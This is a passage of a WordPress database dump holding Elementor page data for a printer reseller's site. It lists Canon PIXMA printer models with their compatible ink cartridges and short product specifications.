(Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"7\\\" align=\\\"center\\\">PIXMA MP970<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP988<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP996<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n  <tr align=\\\"center\\\">\\n    <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n    <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX308<\\/td>\\n    <td>CL-41 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-831 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40\\/CL-41 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-830 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX328<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX338<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX347<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX366<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX426<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX876<\\/td>\\n    <td>CLI-821 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-820 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX886<\\/td>\\n    <td>CLI-726 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-725 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA PRO-1<\\/td>\\n    <td>PGI-29 (Chroma Optimizer)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Dark Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Light Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Matte Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Red)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Yellow)<\\/td>\\n  <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA PRO-10<\\/td>\\n      <td>PGI-72 (Chroma Optimizer)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Matte Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Red)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-72 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"8\\\" align=\\\"center\\\">PIXMA PRO-100<\\/td>\\n      <td>CLI-42 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Light Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-42 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TR8570<\\/td>\\n      <td>CLI-781 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-781XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-780XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS207<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA TS307<\\/td>\\n      <td>CL-746 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746S (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-746XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745S (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-745XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA TS5070<\\/td>\\n      <td>CLI-771 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-771XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-770XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA TS5170<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7146,3335,'_wp_page_template','template-fullwidth.php'),(7147,3335,'_elementor_edit_mode','builder'),(7148,3335,'_elementor_template_type','post');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (7149,3335,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 